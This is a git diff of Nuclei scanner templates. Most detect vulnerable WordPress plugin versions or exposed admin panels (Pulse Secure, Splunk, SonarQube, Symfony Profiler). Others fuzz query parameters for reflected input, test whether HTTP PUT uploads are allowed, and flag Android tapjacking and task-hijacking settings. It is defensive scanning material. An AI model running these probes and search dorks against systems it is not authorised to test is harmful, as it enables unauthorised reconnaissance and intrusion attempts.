b/poc/other/premium-addons-for-elementor-6304eb6368ed9f8217294c91faa22c83.yaml @@ -0,0 +1,59 @@ +id: premium-addons-for-elementor-6304eb6368ed9f8217294c91faa22c83 + +info: + name: > + Premium Addons for Elementor <= 4.10.36 - Authenticated (Contributor+) Stored DOM-Based Cross-Site Scripting via Animated Text Widget + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/005fc05c-6d82-49ca-b114-a3e64a3a572f?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/premium-addons-for-elementor/" + google-query: inurl:"/wp-content/plugins/premium-addons-for-elementor/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,premium-addons-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/premium-addons-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "premium-addons-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.10.36') \ No newline at end of file diff --git a/poc/other/premium-blocks-for-gutenberg.yaml b/poc/other/premium-blocks-for-gutenberg.yaml new file mode 100644 index 0000000000..a8e77c8edd --- /dev/null +++ b/poc/other/premium-blocks-for-gutenberg.yaml @@ -0,0 +1,59 @@ +id: premium-blocks-for-gutenberg + +info: + name: > + Premium Blocks – Gutenberg Blocks for WordPress <= 2.1.27 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/cac4608e-9eee-4e36-b219-a6133bac8a5f?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/premium-blocks-for-gutenberg/" + google-query: inurl:"/wp-content/plugins/premium-blocks-for-gutenberg/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,premium-blocks-for-gutenberg,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/premium-blocks-for-gutenberg/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "premium-blocks-for-gutenberg" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.27') \ No newline at end of file diff --git a/poc/other/pulse-secure-panel-9714.yaml b/poc/other/pulse-secure-panel-9714.yaml index 55cb67a8e2..c21b8845cc 100644 --- a/poc/other/pulse-secure-panel-9714.yaml +++ b/poc/other/pulse-secure-panel-9714.yaml @@ -3,21 +3,17 @@ info: name: Pulse Secure VPN Panel author: bsysop severity: info - tags: panel,pulse,vpn requests: - method: GET path: - "{{BaseURL}}/dana-na/auth/url_default/welcome.cgi" - - "{{BaseURL}}/dana-na/auth/url_2/welcome.cgi" - - "{{BaseURL}}/dana-na/auth/url_3/welcome.cgi" - stop-at-first-match: true matchers-condition: or matchers: - type: word - part: header words: - "/dana-na/auth/welcome.cgi" - - type: regex + part: header + - type: word + words: + - "/dana-na/css/ds.css" part: body - regex: - - "(?i)/dana-na/css/ds(_[a-f0-9]{64})?.css" diff --git a/poc/other/puppetboard-panel-9716.yaml b/poc/other/puppetboard-panel-9716.yaml index 38ac4c35af..81bd1574b7 100644 --- a/poc/other/puppetboard-panel-9716.yaml +++ b/poc/other/puppetboard-panel-9716.yaml @@ -1,11 +1,11 @@ id: puppetboard-panel info: - name: Puppetlabs Puppetboard detection + name: Puppetlabs Puppetboard author: c-sh0 severity: info metadata: shodan-query: http.title:"Puppetboard" - tags: panel,puppet,tech,exposure + tags: panel,puppet,exposure requests: - method: GET path: diff --git a/poc/other/put-method-enabled-9726.yaml b/poc/other/put-method-enabled-9726.yaml index 01a3795506..9fbf7ae3d3 100644 --- a/poc/other/put-method-enabled-9726.yaml +++ b/poc/other/put-method-enabled-9726.yaml @@ -1,22 +1,28 @@ id: put-method-enabled info: - name: PUT method enabled + name: PUT Method Enabled author: xElkomy severity: high - reference: https://portswigger.net/kb/issues/00100900_http-put-method-is-enabled + description: The HTTP PUT method is normally used to upload data that is saved on the server at a user-supplied URL. If enabled, an attacker may be able to place arbitrary, and potentially malicious, content into the application. Depending on the server's configuration, this may lead to compromise of other users (by uploading client-executable scripts), compromise of the server (by uploading server-executable code), or other attacks. + reference: + - https://portswigger.net/kb/issues/00100900_http-put-method-is-enabled tags: injection requests: - raw: - | PUT /testing-put.txt HTTP/1.1 + Host: {{Hostname}} Content-Type: text/plain {{randstr}} - | GET /testing-put.txt HTTP/1.1 + Host: {{Hostname}} Content-Type: text/plain req-condition: true matchers: - type: dsl dsl: - 'contains(body_2, "{{randstr}}")' + +# Enhanced by mp on 2022/04/20 diff --git a/poc/other/pypicloud-panel-9733.yaml b/poc/other/pypicloud-panel-9733.yaml index ed93546114..984e2eeabd 100644 --- a/poc/other/pypicloud-panel-9733.yaml +++ b/poc/other/pypicloud-panel-9733.yaml @@ -1,19 +1,17 @@ id: pypicloud-panel - info: name: Pypicloud panel detection author: Supras severity: info - reference: https://pypicloud.readthedocs.io/en/latest/ + reference: + - https://pypicloud.readthedocs.io/en/latest/ metadata: - google-query: 'intext:pypicloud' + google-query: intext:pypicloud tags: panel,pypicloud - requests: - method: GET path: - '{{BaseURL}}/login' - matchers-condition: and matchers: - type: word @@ -22,7 +20,6 @@ requests: - 'Pypicloud' - '' condition: or - - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/poc/other/radius-manager-9794.yaml b/poc/other/radius-manager-9794.yaml index 019cdf2212..ec613b8f78 100644 --- a/poc/other/radius-manager-9794.yaml +++ b/poc/other/radius-manager-9794.yaml @@ -1,10 +1,13 @@ id: radius-manager-login + info: name: Radius Manager Control Panel author: dhiyaneshDK severity: info - reference: https://www.exploit-db.com/ghdb/6790 + reference: + - https://www.exploit-db.com/ghdb/6790 tags: panel,radius + requests: - method: GET path: @@ -12,6 +15,7 @@ requests: - '{{BaseURL}}/admin.php' - '{{BaseURL}}/radiusmanager/user.php' - '{{BaseURL}}/user.php' + matchers-condition: and matchers: - type: word diff --git a/poc/other/reflector.yaml b/poc/other/reflector.yaml new file mode 100644 index 0000000000..0fb4fec8c6 --- /dev/null +++ b/poc/other/reflector.yaml @@ -0,0 +1,74 @@ +id: reflected-value-via-query + +info: + name: Check reflected-values in response body. + author: D4rk Sh4dow + severity: low + description: | + This template tests for reflected values in query parameters by sending different encoded payloads and matching the responses. + tags: xss,low,fuzz + +http: + - method: GET + path: + - "{{BaseURL}}" + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0 + + payloads: + payload: + - thed4rksh4dow1337 + - '%62%75%67%63%72%6F%77%64%72%65%73%65%63%68%65%72%32%32%32' + - YnVnY3Jvd2RyZXNlY2hlcjMzMw== + - 'bugcrowdresecher44' + + attack: batteringram + + fuzzing: + - part: query + fuzz: + - "{{payload}}" + + matchers-condition: and + matchers: + - type: word + words: + - thed4rksh4dow1337 + - thed4rksh4dow222 + - thed4rksh4dow333 + - thed4rksh4dow444 + part: body + condition: or + + - type: word + words: + - "Content-type: application/json" + part: header + negative: true + + extractors: + - type: regex + part: body + name: plaintext + regex: + - "thed4rksh4dow1337" #1payload-worked + + - type: regex + part: body + name: urlencode + regex: + - "thed4rksh4dow222" #2payload-worked + + - type: regex + part: body + name: base64encode + regex: + - "thed4rksh4dow333" #3payload-worked + + - type: regex + part: body + name: htmlencode + regex: + - "thed4rksh4dow444" #4payload-worked + + stop-at-first-match: true diff --git a/poc/other/robots-txt-9886.yaml b/poc/other/robots-txt-9886.yaml index f23d4b4951..1518b8c2d3 100644 --- a/poc/other/robots-txt-9886.yaml +++ b/poc/other/robots-txt-9886.yaml @@ -3,13 +3,12 @@ info: name: robots.txt file author: CasperGN severity: info - tags: misc,generic + tags: misc requests: - method: GET path: - "{{BaseURL}}/robots.txt" - matchers-condition: and redirects: true matchers: @@ -18,9 +17,9 @@ requests: - "Disallow:" - type: word - part: header words: - text/plain + part: header - type: dsl dsl: diff --git a/poc/other/rsa-self-service-9910.yaml b/poc/other/rsa-self-service-9910.yaml index 35e60db85a..c550c20e0f 100644 --- a/poc/other/rsa-self-service-9910.yaml +++ b/poc/other/rsa-self-service-9910.yaml @@ -1,9 +1,11 @@ id: rsa-self-service + info: name: Detect RSA Self-Service Panel author: PR3R00T severity: info - tags: panel + tags: panel,rsa + requests: - method: GET path: diff --git a/poc/other/scs-landfill-control-10097.yaml b/poc/other/scs-landfill-control-10097.yaml index 4500e3e023..21dbb52d41 100644 --- a/poc/other/scs-landfill-control-10097.yaml +++ b/poc/other/scs-landfill-control-10097.yaml @@ -1,5 +1,4 @@ id: scs-landfill-control - info: name: SCS Landfill Remote Monitoring Control description: SCS RMC is the IoT for landfills, manufacturing, and industrial facilities that provides real-time viewing, analysis, and control of equipment and systems critical to production and safe operations remotely. @@ -7,12 +6,10 @@ info: author: geeknik severity: info tags: panel,scs,rmc,iot - requests: - method: GET path: - "{{BaseURL}}" - redirects: true matchers-condition: and matchers: diff --git a/poc/other/securepoint-utm-10117.yaml b/poc/other/securepoint-utm-10117.yaml index a3f43afa95..bca9fb0742 100644 --- a/poc/other/securepoint-utm-10117.yaml +++ b/poc/other/securepoint-utm-10117.yaml @@ -1,32 +1,32 @@ -id: securepoint-utm - -info: - name: Securepoint UTM Admin Panel - author: pussycat0x - severity: info - metadata: - fofa-dork: 'app="Securepoint-UTM-v11-Admin-Interface-11.8.8.8"' - tags: securepoint,panel - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: regex - part: body - regex: - - 'Securepoint UTM v11 - (.*)' - - extractors: - - type: regex - part: body - group: 1 - regex: - - '\- Admin Interface \- ([0-9. (a-z)]+)<\/title>' +id: securepoint-utm + +info: + name: Securepoint UTM Admin Panel + author: pussycat0x + severity: info + metadata: + fofa-dork: 'app="Securepoint-UTM-v11-Admin-Interface-11.8.8.8"' + tags: securepoint,panel + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: regex + part: body + regex: + - 'Securepoint UTM v11 - (.*)' + + extractors: + - type: regex + part: body + group: 1 + regex: + - '\- Admin Interface \- ([0-9. (a-z)]+)<\/title>' diff --git a/poc/other/servfail-refused-hosts-10167.yaml b/poc/other/servfail-refused-hosts-10167.yaml index 38af557681..3c341e2f2e 100644 --- a/poc/other/servfail-refused-hosts-10167.yaml +++ b/poc/other/servfail-refused-hosts-10167.yaml @@ -1,14 +1,12 @@ id: servfail-refused-hosts info: name: Servfail Host Finder - author: mzack9999 + author: pdteam severity: info + tags: dns,takeover dns: - name: "{{FQDN}}" type: A - class: inet - recursion: true - retries: 3 matchers: - type: word words: diff --git a/poc/other/shell-history-10193.yaml b/poc/other/shell-history-10193.yaml index 1e715e7760..f6762a888b 100644 --- a/poc/other/shell-history-10193.yaml +++ b/poc/other/shell-history-10193.yaml @@ -42,5 +42,5 @@ requests: - "application/xml" - "html>" - "text/html" - part: response + part: all negative: true diff --git a/poc/other/shopbuilder-1e0d2f1d57e65fa24c1453dd3f012637.yaml b/poc/other/shopbuilder-1e0d2f1d57e65fa24c1453dd3f012637.yaml new file mode 100644 index 0000000000..3092feb032 --- /dev/null +++ b/poc/other/shopbuilder-1e0d2f1d57e65fa24c1453dd3f012637.yaml @@ -0,0 +1,59 @@ +id: shopbuilder-1e0d2f1d57e65fa24c1453dd3f012637 + +info: + name: > + ShopBuilder – Elementor WooCommerce Builder Addons <= 2.1.12 - Authenticated (Contributor+) Local File Inclusion + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/23b6e418-5560-4543-9042-5f338df315e5?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/shopbuilder/" + google-query: inurl:"/wp-content/plugins/shopbuilder/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,shopbuilder,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/shopbuilder/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "shopbuilder" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.12') \ No newline at end of file diff --git a/poc/other/signatures-10248.yaml b/poc/other/signatures-10248.yaml index 60a89e35d0..3ba432f470 100644 --- a/poc/other/signatures-10248.yaml +++ b/poc/other/signatures-10248.yaml @@ -3,17 +3,18 @@ id: wordpress info: name: WordPress User Name Information - Detect author: dwisiswant0 - description: WordPress user name information check was conducted. severity: info + description: WordPress user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-blog,wordpress metadata: max-request: 1 + tags: osint,osint-blog,wordpress self-contained: true + http: - method: GET path: @@ -30,4 +31,4 @@ http: words: - "user-member-since" -# Enhanced by cs 03/17/2023 +# digest: 4a0a00473045022100fc04abf609c545f2d62456a051a0d3b96abbadcfb3fd3d61181d47cd3a7b1b77022058d5952c681fe8c9f7184cc6d8620d4b2cf70d36320911b4f9ec11406728bfe0:922c64590222798bb761d5b6d8e72950 diff --git a/poc/other/simple-form.yaml b/poc/other/simple-form.yaml new file mode 100644 index 0000000000..5fe249e6a8 --- /dev/null +++ b/poc/other/simple-form.yaml @@ -0,0 +1,59 @@ +id: simple-form + +info: + name: > + FormFlow <= 2.12.1 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/26decafa-2329-406a-a48b-f4e6867f60df?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/simple-form/" + google-query: inurl:"/wp-content/plugins/simple-form/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,simple-form,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/simple-form/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "simple-form" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.12.1') \ No newline at end of file diff --git a/poc/other/sirv-08818daaf191a4ffbabac53e3df53de2.yaml b/poc/other/sirv-08818daaf191a4ffbabac53e3df53de2.yaml new file mode 100644 index 0000000000..c2a38e6383 --- /dev/null +++ b/poc/other/sirv-08818daaf191a4ffbabac53e3df53de2.yaml @@ -0,0 +1,59 @@ +id: sirv-08818daaf191a4ffbabac53e3df53de2 + +info: + name: > + Image Optimizer, Resizer and CDN – Sirv <= 7.2.7 - Authenticated(Subscriber+) Missing Authorization to Plugin Settings Update + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/229490c3-d820-4831-b105-a429512c2c60?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/sirv/" + google-query: inurl:"/wp-content/plugins/sirv/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,sirv,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/sirv/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "sirv" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 7.2.7') \ No newline at end of file diff --git a/poc/other/skycaiji-admin-panel-10304.yaml b/poc/other/skycaiji-admin-panel-10304.yaml index e83c2814df..7f14f6e474 100644 --- a/poc/other/skycaiji-admin-panel-10304.yaml +++ b/poc/other/skycaiji-admin-panel-10304.yaml @@ -1,13 +1,25 @@ id: skycaiji-admin-panel + info: - name: SkyCaiji Admin Panel + name: SkyCaiji Admin Panel - Detect author: princechaddha severity: info + description: SkyCaiji admin panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cwe-id: CWE-200 + cpe: cpe:2.3:a:skycaiji:skycaiji:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + product: skycaiji + vendor: skycaiji tags: panel,tech,skycaiji -requests: + +http: - method: GET path: - "{{BaseURL}}/index.php?s=/admin/Index/index" + matchers-condition: and matchers: - type: word @@ -16,12 +28,15 @@ requests: - '

Powered by ' - '' condition: and + - type: status status: - 200 + extractors: - type: regex part: body group: 1 regex: - 'com">SkyCaiji<\/a> ([A-Z0-9.]+) 后台管理<\/p>' +# digest: 4b0a004830460221009ce109dadd530fb2af3ec5f982fad37cb2a53cf79752ace82cc7042566d296aa022100b9dc09fce81f03f4d0a545b8b4e59c0eafc221da4b1889b6d2f535e7069af3cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/solarwinds-orion-10357.yaml b/poc/other/solarwinds-orion-10357.yaml index ed83c87d2b..9ab0d7bad7 100644 --- a/poc/other/solarwinds-orion-10357.yaml +++ b/poc/other/solarwinds-orion-10357.yaml @@ -1,15 +1,16 @@ id: solarwinds-orion + info: name: SolarWinds Orion Panel author: puzzlepeaches severity: info - tags: panel + tags: panel,solarwinds + requests: - method: GET path: - "{{BaseURL}}/Orion/Login.aspx" - headers: - User-Agent: "Mozilla Firefox Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:53.0) Gecko/20100101 Firefox/53.0" + matchers: - type: word words: diff --git a/poc/other/sonarqube-public-projects-10379.yaml b/poc/other/sonarqube-public-projects-10379.yaml index 8fbf957e16..a2aad16212 100644 --- a/poc/other/sonarqube-public-projects-10379.yaml +++ b/poc/other/sonarqube-public-projects-10379.yaml @@ -1,28 +1,23 @@ id: sonarqube-public-projects - info: name: Sonarqube with public projects author: sickwell severity: low tags: sonarqube,misconfig reference: https://next.sonarqube.com/sonarqube/web_api/api/components/suggestions?internal=true - requests: - method: GET path: - "{{BaseURL}}/api/components/suggestions?recentlyBrowsed=" - matchers-condition: and matchers: - - type: status status: - 200 - - type: word words: - '"results":' - '"items":' - '"more":' part: body - condition: and \ No newline at end of file + condition: and diff --git a/poc/other/sonicwall-sslvpn-panel-10390.yaml b/poc/other/sonicwall-sslvpn-panel-10390.yaml index 8f24565d45..4025c28287 100644 --- a/poc/other/sonicwall-sslvpn-panel-10390.yaml +++ b/poc/other/sonicwall-sslvpn-panel-10390.yaml @@ -1,9 +1,11 @@ id: sonicwall-sslvpn-panel + info: name: SonicWall Virtual Office SSLVPN Panel author: PR3R00T severity: info - tags: panel + tags: panel,sonicwall + requests: - method: GET path: diff --git a/poc/other/splunk-enterprise-panel-10414.yaml b/poc/other/splunk-enterprise-panel-10414.yaml index c88257a6d6..af5162d861 100644 --- a/poc/other/splunk-enterprise-panel-10414.yaml +++ b/poc/other/splunk-enterprise-panel-10414.yaml @@ -1,30 +1,22 @@ id: splunk-enterprise-panel + info: - name: Splunk Enterprise Panel Detect + name: Splunk Enterprise Panel author: praetorian-thendrickson severity: info - reference: https://www.splunk.com/en_us/software/splunk-enterprise.html - metadata: - shodan-query: http.title:"Login - Splunk" + reference: https://www.shodan.io/search?query=title%3A%22Login+Splunk%22 tags: panel,splunk + requests: - method: GET path: - '{{BaseURL}}/en-US/account/login' redirects: true + matchers-condition: and matchers: - type: word words: - 'Splunk Inc.' - - type: status - status: - - 200 - extractors: - - type: regex - part: body - group: 1 - regex: - - '"version": "(.*)"' - - 'versionNumber": "([0-9.]+)"' - - '"VERSION_LABEL": "([0-9.]+)"' + - 'splunkd' + - 'Splunk Enterprise' diff --git a/poc/other/spoofable-spf-records-ptr-10426.yaml b/poc/other/spoofable-spf-records-ptr-10426.yaml index 993131749a..48815cf189 100644 --- a/poc/other/spoofable-spf-records-ptr-10426.yaml +++ b/poc/other/spoofable-spf-records-ptr-10426.yaml @@ -1,4 +1,5 @@ id: spoofable-spf-records-ptr + info: name: Spoofable SPF Records with PTR Mechanism author: binaryfigments @@ -9,9 +10,11 @@ info: classification: cwe-id: CWE-200 tags: dns,spf + dns: - name: "{{FQDN}}" type: TXT + matchers: - type: word words: diff --git a/poc/other/sugarcrm-panel-10571.yaml b/poc/other/sugarcrm-panel-10571.yaml index c76645fdf8..b631adf067 100644 --- a/poc/other/sugarcrm-panel-10571.yaml +++ b/poc/other/sugarcrm-panel-10571.yaml @@ -1,19 +1,15 @@ id: sugarcrm-panel - info: name: Detect SugarCRM Panel author: johnk3r severity: info - metadata: - shodan-query: http.title:sugarcrm + reference: https://www.shodan.io/search?query=sugarcrm tags: sugarcrm,panel - requests: - method: GET path: - "{{BaseURL}}" - "{{BaseURL}}/index.php?action=Login&module=Users" - stop-at-first-match: true matchers-condition: and matchers: @@ -21,7 +17,6 @@ requests: part: body words: - "SugarCRM" - - type: status status: - 200 diff --git a/poc/other/symantec-pgp-global-directory-10611.yaml b/poc/other/symantec-pgp-global-directory-10611.yaml index e6a725063e..7220936063 100644 --- a/poc/other/symantec-pgp-global-directory-10611.yaml +++ b/poc/other/symantec-pgp-global-directory-10611.yaml @@ -3,7 +3,8 @@ info: name: Symantec PGP Global Directory author: princechaddha severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22PGP+Global+Directory%22 + metadata: + shodan-query: http.title:"PGP Global Directory" tags: symantec,panel requests: - method: GET diff --git a/poc/other/symfony-profiler-10626.yaml b/poc/other/symfony-profiler-10626.yaml index 13df9b71fd..e9bc72222c 100644 --- a/poc/other/symfony-profiler-10626.yaml +++ b/poc/other/symfony-profiler-10626.yaml @@ -3,15 +3,18 @@ info: name: Symfony Profiler author: pdteam severity: high + metadata: + verified: true + shodan-query: http.html:"symfony Profiler" tags: config,exposure,symfony requests: - method: GET path: - "{{BaseURL}}/_profiler/empty/search/results?limit=10" + - "{{BaseURL}}/app_dev.php/_profiler/empty/search/results?limit=10" + stop-at-first-match: true matchers: - type: word - words: - - "Symfony Profiler" - - "symfony/profiler/" - condition: and part: body + words: + - "Symfony Profiler" diff --git a/poc/other/tablesome-0f466f42ae94782b7c708f6954691bb3.yaml b/poc/other/tablesome-0f466f42ae94782b7c708f6954691bb3.yaml new file mode 100644 index 0000000000..20de234cfc --- /dev/null +++ b/poc/other/tablesome-0f466f42ae94782b7c708f6954691bb3.yaml @@ -0,0 +1,59 @@ +id: tablesome-0f466f42ae94782b7c708f6954691bb3 + +info: + name: > + Table & Contact Form 7 Database – Tablesome <= 1.0.33 - Unauthenticated Sensitive Information Exposure + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5b680158-0752-46bd-a5bb-343b65c0aeb4?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/tablesome/" + google-query: inurl:"/wp-content/plugins/tablesome/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,tablesome,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/tablesome/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "tablesome" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.33') \ No newline at end of file diff --git a/poc/other/tabnabbing-check-10644.yaml b/poc/other/tabnabbing-check-10644.yaml index 2c5ab5418b..b92943f34c 100644 --- a/poc/other/tabnabbing-check-10644.yaml +++ b/poc/other/tabnabbing-check-10644.yaml @@ -1,4 +1,5 @@ id: tabnabbing-check + info: name: Reverse Tabnabbing author: bolli95 @@ -8,10 +9,12 @@ info: - https://owasp.org/www-community/attacks/Reverse_Tabnabbing - https://www.youtube.com/watch?v=TMKZCHYmtD4 - https://hackerone.com/reports/211065 + requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: dsl @@ -19,4 +22,4 @@ requests: - 'regex("", replace_regex(replace_regex(body, "", ""), "", "")) || regex("window\.open\\([^,]+\\)", body)' - type: dsl dsl: - - "!contains(tolower(all_headers), 'referrer-policy: no-referrer')" + - "!contains(tolower(all_headers), 'referrer-policy: no-referrer')" \ No newline at end of file diff --git a/poc/other/tapjacking.yaml b/poc/other/tapjacking.yaml new file mode 100644 index 0000000000..98aa39d2df --- /dev/null +++ b/poc/other/tapjacking.yaml @@ -0,0 +1,43 @@ +id: tapjacking + +info: + name: TapJacking + author: YoruYagami + severity: low + description: | + "TapJacking" is an attack strategy where a malicious application displays a fake user interface that seems to accept user interactions but actually passes events such as finger presses to a hidden user interface behind it. This attack, similar to the web counterpart known as "Clickjacking," can be accomplished using the screen overlay functionality present in all recent versions of Android. + remediation: | + Developers can prevent this attack by ensuring that the attribute `filterTouchesWhenObscured` is set to true on all views or by implementing the method `onFilterTouchEventForSecurity()`. + + Example: + + ```xml + + ``` + + or + + ```java + @Override + public boolean onFilterTouchEventForSecurity(MotionEvent event) { + if ((event.getFlags() & MotionEvent.FLAG_WINDOW_IS_OBSCURED) != 0) { + // Drop the touch event. + return false; + } + return super.onFilterTouchEventForSecurity(event); + } + ``` + +file: + - extensions: + - xml + - java + + matchers: + - type: word + words: + - "filterTouchesWhenObscured" + - "onFilterTouchEventForSecurity" diff --git a/poc/other/task-hijacking.yaml b/poc/other/task-hijacking.yaml new file mode 100644 index 0000000000..e7840eb573 --- /dev/null +++ b/poc/other/task-hijacking.yaml @@ -0,0 +1,35 @@ +id: task-hijacking + +info: + name: Task Hijacking + author: YoruYagami + severity: medium + description: | + In the Android platform, a task is a collection of activities with which users interact. By default, they are arranged in a reverse stack, in the order in which each activity is opened: the activity displayed on the screen is referred to as the "foreground," and its task is also referred to as the foreground. Only one foreground activity is visible on the screen at a time. + Task affinity is an attribute that indicates which task an activity prefers to belong to. By default, all activities of the same app have affinity equal to the application name (qualified with the package). + Task hijacking is a series of vulnerabilities that exploit this property to perform phishing and denial of use attacks; it has often been exploited by banking malware in the past to steal credentials. The attack has several strategies: + - A malicious application that sets its task affinity to the same value as the package name of a vulnerable application, along with the `allowTaskReparenting` flag set to true, will intercept the activity opening of the original application with the malicious activity. + - If the activity has the `launchMode` attribute set to `singleTask`, a malicious application that sets its task affinity to the same value as the package name of a vulnerable application will replace the foreground activity upon opening. + - An application with the `taskReparenting` attribute set to true allows a malicious application to overlay its task over the legitimate one. + remediation: | + Set the `taskAffinity` attribute to an empty value (`taskAffinity=""`) in the AndroidManifest.xml file to force a random, unpredictable value that cannot be exploited by malicious third-party applications. + + Example: + + ```xml + + ``` + +file: + - extensions: + - xml + + matchers: + - type: word + words: + - "taskAffinity" + - "allowTaskReparenting" + - "launchMode" + - "taskReparenting" diff --git a/poc/other/template-kit-export-6bdaa0985198067bd73744917a981188.yaml b/poc/other/template-kit-export-6bdaa0985198067bd73744917a981188.yaml new file mode 100644 index 0000000000..2db57f706a --- /dev/null +++ b/poc/other/template-kit-export-6bdaa0985198067bd73744917a981188.yaml @@ -0,0 +1,59 @@ +id: template-kit-export-6bdaa0985198067bd73744917a981188 + +info: + name: > + Template Kit – Export <= 1.0.21 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4e7de990-4a6b-4bae-89a2-4a417071fe20?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/template-kit-export/" + google-query: inurl:"/wp-content/plugins/template-kit-export/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,template-kit-export,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/template-kit-export/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "template-kit-export" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.21') \ No newline at end of file diff --git 